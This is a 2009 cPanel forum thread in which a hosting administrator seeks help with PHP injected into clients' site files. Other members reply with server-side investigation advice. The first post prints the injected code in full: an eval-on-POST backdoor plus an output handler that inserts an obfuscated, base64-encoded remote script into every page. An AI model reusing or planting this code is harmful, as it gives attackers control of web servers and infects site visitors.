Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

iframe/php exploit again

Discussion in 'General Discussion' started by gertiebeth, Mar 16, 2009.

  1. gertiebeth

    gertiebeth Well-Known Member

    Jun 4, 2003
    Likes Received:
    Trophy Points:
    Minnesota, USA
    cPanel Access Level:
    Root Administrator
    I currently run 22 linex servers using cPanel with heavy mod_security rules and a firewall. PHP has been hardened and many other security measures are in place. Right now I have 3 different people that I host who are suffering from php include hacks. It is only 3 people and their sites are hosted on several different servers. No one else is having a problem, which leads me to believe this is a problem with the user's PC. But for the life of me I cannot find out how to help them! I have tried Google, but I'm not quite search what to search for. Here is an example of the malicious code that is being inserting into their index.php, admin.php and other files:

    <?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<10;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdwR3YlM0NwR3Zzczd4Y3JpcEd2cHQlMjBod3pzcmMzZ0QlM0QlMkZod3olMkY3OCUyRVo3WjExMFo3WiUyRTE3T281R0Q4JTJFMjRIYjlPbyUyRmpPb3F1ZXJHRDh5JTJFSGJqc0dEOCUzRVo3WiUzQzNnRCUyRnNjWjdack9vaWh3enB0JTNFJykucmVwbGFjZSgvSGJ8T298b0t8cEd2fEdEOHwzZ0R8czd4fFo3Wnxod3ovZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
    Does anyone recognize this? All I've been able to find is problems back in 2008 with IX webhosting, which I have no affiliation with. All of my servers are managed by me from SoftLayer.

    Any help?
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  2. LiNUxG0d

    LiNUxG0d Well-Known Member

    Jun 25, 2003
    Likes Received:
    Trophy Points:
    Gatineau, Quebec, Canada
    Typical source injections...

    The common things you can look at, on the server side, are these:

    - Locate references to .txt in a users domlogs (in the URI portion of accesses), to see if they logged in using a PHP include... there shouldn't be any if you run mod_sec heavily, but there might... :P

    - Check the /var/log/messages to see if the hackers have privs by password that the user may not be aware of.

    - Do the same, but for /usr/local/cpanel/logs/access_log (grep the users' username and sift through the IPs for oddballs)

    Are you locking down php.ini at all? (disable_functions)

    If the user has a cPanel with reseller privs, then you may need to reset their WHM password, as it may be compromised.

    Realistically, if it's 3 or so sites, I would think a keylogger on their home PC. If it's 3 or so SERVERS with 100+ accounts or something to that effect, I would think it may be rooted, depending on what's installed on it and how old your kernel is.

    There are - really - many many many guesstimatable factors in your equation... if there are no logs to prove intrusion, then I would suspect that the issue is more serious than you may think.

    Never take it lightly. I'm sure you don't. :)
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
    #2 LiNUxG0d, Mar 16, 2009
    Last edited: Mar 16, 2009
  3. AndyReed

    AndyReed Well-Known Member PartnerNOC

    May 29, 2004
    Likes Received:
    Trophy Points:
    Minneapolis, MN
    There are several threads that discussed the iframe injection problem. Check out these threads:
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Similar Threads - iframe exploit again
  1. Sameera Wijerathne
  2. Serra

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice